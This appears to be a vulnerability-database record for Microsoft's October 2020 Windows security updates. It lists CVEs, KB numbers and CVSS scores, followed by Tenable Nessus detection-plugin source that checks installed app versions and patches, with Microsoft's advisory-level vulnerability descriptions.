| [CVE-2020-16901](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16901>) | 2.1 | Warning |
| [CVE-2020-16896](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16896>) | 5.0 | Critical |
| [CVE-2020-16897](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16897>) | 2.1 | Warning |
| [CVE-2020-16973](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16973>) | 4.6 | Warning |
| [CVE-2020-16899](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16899>) | 7.8 | Critical |
| [CVE-2020-1047](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1047>) | 7.2 | High |
| [CVE-2020-16976](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16976>) | 4.6 | Warning |
| [CVE-2020-16975](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16975>) | 4.6 | Warning |
| [CVE-2020-16974](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16974>) | 4.6 | Warning |
| [CVE-2020-16936](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16936>) | 4.6 | Warning |
| [CVE-2020-16935](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16935>) | 7.2 | High |
| [CVE-2020-1167](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1167>) | 9.3 | Critical |
| [CVE-2020-16877](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16877>) | 3.6 | Warning |
| [CVE-2020-16912](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16912>) | 4.6 | Warning |
| [CVE-2020-1080](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1080>) | 7.2 | High |
| [CVE-2020-16914](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16914>) | 2.1 | Warning |
| [CVE-2020-16916](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16916>) | 7.2 | High |
| [CVE-2020-16911](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16911>) | 9.3 | Critical |
| [CVE-2020-16910](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16910>) | 4.3 | Warning |
| [CVE-2020-16913](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16913>) | 7.2 | High |
| [CVE-2020-16938](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16938>) | 2.1 | Warning |
| [CVE-2020-16915](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16915>) | 6.8 | High |
| [CVE-2020-16921](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16921>) | 2.1 | Warning |
| [CVE-2020-16895](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16895>) | 7.2 | High |

### *KB list*:

- [4577041](<http://support.microsoft.com/kb/4577041>)
- [4577049](<http://support.microsoft.com/kb/4577049>)
- [4580328](<http://support.microsoft.com/kb/4580328>)
- [4580330](<http://support.microsoft.com/kb/4580330>)
- [4580327](<http://support.microsoft.com/kb/4580327>)
- [4580346](<http://support.microsoft.com/kb/4580346>)
- [4579311](<http://support.microsoft.com/kb/4579311>)
- [4580353](<http://support.microsoft.com/kb/4580353>)
- [4580347](<http://support.microsoft.com/kb/4580347>)
- [4580382](<http://support.microsoft.com/kb/4580382>)
- [4580358](<http://support.microsoft.com/kb/4580358>)
- [4577668](<http://support.microsoft.com/kb/4577668>)
- [4577671](<http://support.microsoft.com/kb/4577671>)

### *Microsoft official advisories*:
", "cvss3": {"exploitabilityScore": 2.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-10-13T00:00:00", "type": "kaspersky", "title": "KLA11977 Multiple vulnerabilities in Microsoft Windows", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, 
"obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0764", "CVE-2020-1047", "CVE-2020-1080", "CVE-2020-1167", "CVE-2020-1243", "CVE-2020-16876", "CVE-2020-16877", "CVE-2020-16885", "CVE-2020-16887", "CVE-2020-16889", "CVE-2020-16890", "CVE-2020-16891", "CVE-2020-16892", "CVE-2020-16894", "CVE-2020-16895", "CVE-2020-16896", "CVE-2020-16897", "CVE-2020-16898", "CVE-2020-16899", "CVE-2020-16900", "CVE-2020-16901", "CVE-2020-16902", "CVE-2020-16905", "CVE-2020-16907", "CVE-2020-16908", "CVE-2020-16909", "CVE-2020-16910", "CVE-2020-16911", "CVE-2020-16912", "CVE-2020-16913", "CVE-2020-16914", "CVE-2020-16915", "CVE-2020-16916", "CVE-2020-16919", "CVE-2020-16920", "CVE-2020-16921", "CVE-2020-16922", "CVE-2020-16923", "CVE-2020-16924", "CVE-2020-16927", "CVE-2020-16935", "CVE-2020-16936", "CVE-2020-16938", "CVE-2020-16939", "CVE-2020-16940", "CVE-2020-16967", "CVE-2020-16968", "CVE-2020-16972", "CVE-2020-16973", "CVE-2020-16974", "CVE-2020-16975", "CVE-2020-16976", "CVE-2020-16980"], "modified": "2022-01-18T00:00:00", "id": "KLA11977", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11977/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2022-02-19T00:53:28", "description": "The Microsoft 3D Viewer app installed on the remote host is affected by a code execution vulnerability when the Base3D rendering engine improperly handles memory. 
An attacker who successfully exploited the vulnerability would gain execution on a victim system.", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2020-10-13T00:00:00", "type": "nessus", "title": "Microsoft 3D Viewer Base3D Code Execution (October 2020)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-16918", "CVE-2020-17003"], "modified": "2020-11-24T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_OCT_3D_VIEWER.NASL", "href": "https://www.tenable.com/plugins/nessus/141430", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(141430);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/11/24\");\n\n script_cve_id(\"CVE-2020-16918\", \"CVE-2020-17003\");\n script_xref(name:\"ZDI\", value:\"ZDI-20-1246\");\n\n script_name(english:\"Microsoft 3D Viewer Base3D Code Execution (October 2020)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Windows app installed on the remote host is affected by a code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Microsoft 3D Viewer app installed on the remote host is affected by a code execution vulnerability when the\nBase3D rendering engine improperly handles memory. 
An attacker who successfully exploited the vulnerability would gain\nexecution on a victim system.\");\n # https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16918\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4a0fa39f\");\n # https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17003\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?baf22b1a\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-20-1246/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to app version 7.2009.29132.0 or later via the Microsoft Store.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-16918\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/10/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/10/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/10/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"wmi_enum_windows_app_store.nbin\");\n script_require_keys(\"SMB/Registry/Enumerated\", \"installed_sw/Microsoft.Microsoft3DViewer\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('smb_func.inc');\n\napp = 'Microsoft.Microsoft3DViewer';\nwin_port = get_kb_item('SMB/transport');\nif (!win_port) win_port = 445;\n\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\napp_info = vcf::get_app_info(app:app, port:win_port);\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nconstraints = [\n { 'fixed_version' : '7.2009.29132.0' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-23T15:10:16", "description": "The remote Windows host is missing security update 4579311.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A spoofing vulnerability exists when Windows incorrectly validates file signatures. An attacker who successfully exploited this vulnerability could bypass security features and load improperly signed files. In an attack scenario, an attacker could bypass security features intended to prevent improperly signed files from being loaded. The update addresses the vulnerability by correcting how Windows validates file signatures.\n (CVE-2020-16922)\n\n - An elevation of privilege vulnerability exists when Windows Error Reporting manager improperly handles a process crash. An attacker who successfully exploited this vulnerability could delete a targeted file leading to an elevated status. (CVE-2020-16895)\n\n - A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory. An attacker who successfully exploited this vulnerability could execute arbitrary code on a victim system. 
An attacker could exploit this vulnerability by enticing a victim to open a specially crafted file. The update addresses the vulnerability by correcting the way the Windows Jet Database Engine handles objects in memory. (CVE-2020-16924)\n\n - An elevation of privilege vulnerability exists when the Windows Storage VSP Driver improperly handles file operations. An attacker who successfully exploited this vulnerability could gain elevated privileges.\n (CVE-2020-16885)\n\n - A remote code execution vulnerability exists in the way that Microsoft Graphics Components handle objects in memory. An attacker who successfully exploited the vulnerability could execute arbitrary code on a target system. (CVE-2020-1167, CVE-2020-16923)\n\n - A remote code execution vulnerability exists when Windows Hyper-V on a host server fails to properly validate input from an authenticated user on a guest operating system. (CVE-2020-16891)\n\n - A remote code execution vulnerability exists when the Windows TCP/IP stack improperly handles ICMPv6 Router Advertisement packets. An attacker who successfully exploited this vulnerability could gain the ability to execute code on the target server or client.\n (CVE-2020-16898)\n\n - An elevation of privilege vulnerability exists in the way that the Windows kernel image handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-16892)\n\n - An information disclosure vulnerability exists in the way that the Windows Graphics Device Interface Plus (GDI+) handles objects in memory, allowing an attacker to retrieve information from a targeted system. 
By itself, the information disclosure does not allow arbitrary code execution; however, it could allow arbitrary code to be run if the attacker uses it in combination with another vulnerability.\n (CVE-2020-16914)\n\n - An elevation of privilege vulnerability exists in the Windows Installer when the Windows Installer fails to properly sanitize input leading to an insecure library loading behavior. A locally authenticated attacker could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. The security update addresses the vulnerability by correcting the input sanitization error to preclude unintended elevation. (CVE-2020-16902)\n\n - An elevation of privilege vulnerability exists when the Windows Storage Services improperly handle file operations. An attacker who successfully exploited this vulnerability could gain elevated privileges.\n (CVE-2020-0764)\n\n - An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-16890)\n\n - An information disclosure vulnerability exists in Remote Desktop Protocol (RDP) when an attacker connects to the target system using RDP and sends specially crafted requests. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-16896)\n\n - A remote code execution vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in the memory. An attacker who successfully exploited this vulnerability could take control of the affected system. 
An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-16911)\n\n - An information disclosure vulnerability exists when NetBIOS over TCP (NBT) Extensions (NetBT) improperly handle objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-16897)\n\n - An elevation of privilege vulnerability exists when the Windows Application Compatibility Client Library improperly handles registry operations. An attacker who successfully exploited this vulnerability could gain elevated privileges. (CVE-2020-16876, CVE-2020-16920)\n\n - A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could install programs; view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit a malicious webpage. The security update addresses the vulnerability by correcting how Windows Media Foundation handles objects in memory. (CVE-2020-16915)\n\n - An elevation of privilege vulnerability exists when the Windows User Profile Service (ProfSvc) improperly handles junction points. An attacker who successfully exploited this vulnerability could delete files and folders in an elevated context. (CVE-2020-16940)\n\n - An elevation of privilege vulnerability exists when Microsoft Windows improperly handles reparse points. An attacker who successfully exploited this vulnerability could overwrite or delete a targeted file that would normally require elevated permissions. 
(CVE-2020-16877)\n\n - A security feature bypass vulnerability exists when Microsoft Windows fails to handle file creation permissions, which could allow an attacker to create files in a protected Unified Extensible Firmware Interface (UEFI) location. (CVE-2020-16910)\n\n - An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-16938)\n\n - A denial of service vulnerability exists when the Windows TCP/IP stack improperly handles ICMPv6 Router Advertisement packets. An attacker who successfully exploited this vulnerability could cause a target system to stop responding. (CVE-2020-16899)\n\n - An elevation of privilege vulnerability exists when Group Policy improperly checks access. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-16939)\n\n - An elevation of privilege vulnerability exists in Windows Error Reporting (WER) when WER handles and executes files. The vulnerability could allow elevation of privilege if an attacker can successfully exploit it.\n An attacker who successfully exploited the vulnerability could gain greater access to sensitive information and system functionality. (CVE-2020-16905, CVE-2020-16909)\n\n - A denial of service vulnerability exists when Microsoft Hyper-V on a host server fails to properly validate specific malicious data from a user on a guest operating system. (CVE-2020-1243)\n\n - An information disclosure vulnerability exists in Text Services Framework when it fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could potentially read data that was not intended to be disclosed. 
Note that this vulnerability would not allow an attacker to execute code or to elevate their user rights directly, but it could be used to obtain information that could be used to try to further compromise the affected system.\n (CVE-2020-16921)\n\n - A remote code execution vulnerability exists when the Windows Camera Codec Pack improperly handles objects in memory. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user. If the current user is logged on with administrative user rights, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-16967, CVE-2020-16968)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Network Connections Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-16887)\n\n - A denial of service vulnerability exists in Remote Desktop Protocol (RDP) when an attacker connects to the target system using RDP and sends specially crafted requests. An attacker who successfully exploited this vulnerability could cause the RDP service on the target system to stop responding. (CVE-2020-16927)\n\n - An elevation of privilege vulnerability exists when the Windows Backup Service improperly handles file operations. (CVE-2020-16912, CVE-2020-16936, CVE-2020-16972, CVE-2020-16973, CVE-2020-16974, CVE-2020-16975, CVE-2020-16976)\n\n - An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. 
An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-16907, CVE-2020-16913)\n\n - An information disclosure vulnerability exists when the .NET Framework improperly handles objects in memory. An attacker who successfully exploited the vulnerability could disclose contents of an affected system's memory.\n (CVE-2020-16937)\n\n - An information disclosure vulnerability exists when the Windows KernelStream improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-16889)\n\n - An elevation of privilege vulnerability exists when Windows improperly handles COM object creation. An attacker who successfully exploited the vulnerability could run arbitrary code with elevated privileges.\n (CVE-2020-16916, CVE-2020-16935)\n\n - An elevation of privilege vulnerability exists when the Windows Event System improperly handles objects in memory. (CVE-2020-16900)\n\n - An elevation of privilege vulnerability exists when Windows Hyper-V on a host server fails to properly handle objects in memory. An attacker who successfully exploited these vulnerabilities could gain elevated privileges on a target operating system. This vulnerability by itself does not allow arbitrary code to be run. However, this vulnerability could be used in conjunction with one or more vulnerabilities (e.g. a remote code execution vulnerability and another elevation of privilege) that could take advantage of the elevated privileges when running. The update addresses the vulnerabilities by correcting how Windows Hyper-V handles objects in memory. (CVE-2020-1047, CVE-2020-1080)\n\n - An information disclosure vulnerability exists when the Windows Enterprise App Management Service improperly handles certain file operations. An attacker who successfully exploited this vulnerability could read arbitrary files. 
An attacker with unprivileged access to a vulnerable system could exploit this vulnerability.\n The security update addresses the vulnerability by ensuring the Windows Enterprise App Management Service properly handles file operations. (CVE-2020-16919)", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2020-10-13T00:00:00", "type": "nessus", "title": "KB4579311: Windows 10 Version 2004 October 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-0764", "CVE-2020-1047", "CVE-2020-1080", "CVE-2020-1167", "CVE-2020-1243", "CVE-2020-16876", "CVE-2020-16877", "CVE-2020-16885", "CVE-2020-16887", "CVE-2020-16889", "CVE-2020-16890", "CVE-2020-16891", "CVE-2020-16892", "CVE-2020-16895", "CVE-2020-16896", "CVE-2020-16897", "CVE-2020-16898", "CVE-2020-16899", "CVE-2020-16900", "CVE-2020-16902", "CVE-2020-16905", "CVE-2020-16907", "CVE-2020-16909", "CVE-2020-16910", "CVE-2020-16911", "CVE-2020-16912", "CVE-2020-16913", "CVE-2020-16914", "CVE-2020-16915", "CVE-2020-16916", "CVE-2020-16919", "CVE-2020-16920", "CVE-2020-16921", "CVE-2020-16922", "CVE-2020-16923", "CVE-2020-16924", "CVE-2020-16927", "CVE-2020-16935", "CVE-2020-16936", "CVE-2020-16937", "CVE-2020-16938", "CVE-2020-16939", "CVE-2020-16940", "CVE-2020-16967", "CVE-2020-16968", "CVE-2020-16972", "CVE-2020-16973", "CVE-2020-16974", "CVE-2020-16975", "CVE-2020-16976"], "modified": "2022-05-12T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_OCT_4579311.NASL", "href": "https://www.tenable.com/plugins/nessus/141423", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(141423);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/12\");\n\n script_cve_id(\n \"CVE-2020-0764\",\n \"CVE-2020-1047\",\n \"CVE-2020-1080\",\n \"CVE-2020-1167\",\n \"CVE-2020-1243\",\n \"CVE-2020-16876\",\n \"CVE-2020-16877\",\n \"CVE-2020-16885\",\n \"CVE-2020-16887\",\n \"CVE-2020-16889\",\n \"CVE-2020-16890\",\n \"CVE-2020-16891\",\n \"CVE-2020-16892\",\n \"CVE-2020-16895\",\n \"CVE-2020-16896\",\n \"CVE-2020-16897\",\n \"CVE-2020-16898\",\n \"CVE-2020-16899\",\n \"CVE-2020-16900\",\n \"CVE-2020-16902\",\n \"CVE-2020-16905\",\n \"CVE-2020-16907\",\n \"CVE-2020-16909\",\n \"CVE-2020-16910\",\n \"CVE-2020-16911\",\n \"CVE-2020-16912\",\n \"CVE-2020-16913\",\n \"CVE-2020-16914\",\n \"CVE-2020-16915\",\n \"CVE-2020-16916\",\n \"CVE-2020-16919\",\n \"CVE-2020-16920\",\n \"CVE-2020-16921\",\n \"CVE-2020-16922\",\n \"CVE-2020-16923\",\n \"CVE-2020-16924\",\n \"CVE-2020-16927\",\n \"CVE-2020-16935\",\n \"CVE-2020-16936\",\n \"CVE-2020-16937\",\n \"CVE-2020-16938\",\n \"CVE-2020-16939\",\n \"CVE-2020-16940\",\n \"CVE-2020-16967\",\n \"CVE-2020-16968\",\n \"CVE-2020-16972\",\n \"CVE-2020-16973\",\n \"CVE-2020-16974\",\n \"CVE-2020-16975\",\n \"CVE-2020-16976\"\n );\n script_xref(name:\"MSKB\", value:\"4579311\");\n script_xref(name:\"MSFT\", value:\"MS20-4579311\");\n script_xref(name:\"IAVA\", value:\"2020-A-0457-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0458-S\");\n\n script_name(english:\"KB4579311: Windows 10 Version 2004 October 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4579311.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A spoofing 
vulnerability exists when Windows incorrectly\n validates file signatures. An attacker who successfully\n exploited this vulnerability could bypass security\n features and load improperly signed files. In an attack\n scenario, an attacker could bypass security features\n intended to prevent improperly signed files from being\n loaded. The update addresses the vulnerability by\n correcting how Windows validates file signatures.\n (CVE-2020-16922)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles a\n process crash. An attacker who successfully exploited\n this vulnerability could delete a targeted file leading\n to an elevated status. (CVE-2020-16895)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-16924)\n\n - An elevation of privilege vulnerability exists when the\n Windows Storage VSP Driver improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could gain elevated privileges.\n (CVE-2020-16885)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute arbitrary code on a target\n system. (CVE-2020-1167, CVE-2020-16923)\n\n - A remote code execution vulnerability exists when\n Windows Hyper-V on a host server fails to properly\n validate input from an authenticated user on a guest\n operating system. 
(CVE-2020-16891)\n\n - A remote code execution vulnerability exists when the\n Windows TCP/IP stack improperly handles ICMPv6 Router\n Advertisement packets. An attacker who successfully\n exploited this vulnerability could gain the ability to\n execute code on the target server or client.\n (CVE-2020-16898)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows kernel image handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-16892)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface Plus\n (GDI+) handles objects in memory, allowing an attacker\n to retrieve information from a targeted system. By\n itself, the information disclosure does not allow\n arbitrary code execution; however, it could allow\n arbitrary code to be run if the attacker uses it in\n combination with another vulnerability.\n (CVE-2020-16914)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when the Windows Installer fails to\n properly sanitize input leading to an insecure library\n loading behavior. A locally authenticated attacker could\n run arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. The security update addresses the vulnerability\n by correcting the input sanitization error to preclude\n unintended elevation. (CVE-2020-16902)\n\n - An elevation of privilege vulnerability exists when the\n Windows Storage Services improperly handle file\n operations. An attacker who successfully exploited this\n vulnerability could gain elevated privileges.\n (CVE-2020-0764)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. 
An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-16890)\n\n - An information disclosure vulnerability exists in Remote\n Desktop Protocol (RDP) when an attacker connects to the\n target system using RDP and sends specially crafted\n requests. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-16896)\n\n - A remote code execution vulnerability exists in the way\n that the Windows Graphics Device Interface (GDI) handles\n objects in the memory. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-16911)\n\n - An information disclosure vulnerability exists when\n NetBIOS over TCP (NBT) Extensions (NetBT) improperly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the users system. (CVE-2020-16897)\n\n - An elevation of privilege vulnerability exists when the\n Windows Application Compatibility Client Library\n improperly handles registry operations. An attacker who\n successfully exploited this vulnerability could gain\n elevated privileges. (CVE-2020-16876, CVE-2020-16920)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. 
There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2020-16915)\n\n - An elevation of privilege vulnerability exists when the\n Windows User Profile Service (ProfSvc) improperly\n handles junction points. An attacker who successfully\n exploited this vulnerability could delete files and\n folders in an elevated context. (CVE-2020-16940)\n\n - An elevation of privilege vulnerability exists when\n Microsoft Windows improperly handles reparse points. An\n attacker who successfully exploited this vulnerability\n could overwrite or delete a targeted file that would\n normally require elevated permissions. (CVE-2020-16877)\n\n - A security feature bypass vulnerability exists when\n Microsoft Windows fails to handle file creation\n permissions, which could allow an attacker to create\n files in a protected Unified Extensible Firmware\n Interface (UEFI) location. (CVE-2020-16910)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-16938)\n\n - A denial of service vulnerability exists when the\n Windows TCP/IP stack improperly handles ICMPv6 Router\n Advertisement packets. An attacker who successfully\n exploited this vulnerability could cause a target system\n to stop responding. (CVE-2020-16899)\n\n - An elevation of privilege vulnerability exists when\n Group Policy improperly checks access. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. 
(CVE-2020-16939)\n\n - An elevation of privilege vulnerability exists in\n Windows Error Reporting (WER) when WER handles and\n executes files. The vulnerability could allow elevation\n of privilege if an attacker can successfully exploit it.\n An attacker who successfully exploited the vulnerability\n could gain greater access to sensitive information and\n system functionality. (CVE-2020-16905, CVE-2020-16909)\n\n - A denial of service vulnerability exists when Microsoft\n Hyper-V on a host server fails to properly validate\n specific malicious data from a user on a guest operating\n system. (CVE-2020-1243)\n\n - An information disclosure vulnerability exists in Text\n Services Framework when it fails to properly handle\n objects in memory. An attacker who successfully\n exploited this vulnerability could potentially read data\n that was not intended to be disclosed. Note that this\n vulnerability would not allow an attacker to execute\n code or to elevate their user rights directly, but it\n could be used to obtain information that could be used\n to try to further compromise the affected system.\n (CVE-2020-16921)\n\n - A remote code execution vulnerability exists when the\n Windows Camera Codec Pack improperly handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could run arbitrary code in the context of\n the current user. If the current user is logged on with\n administrative user rights, an attacker could take\n control of the affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-16967, CVE-2020-16968)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network Connections Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. 
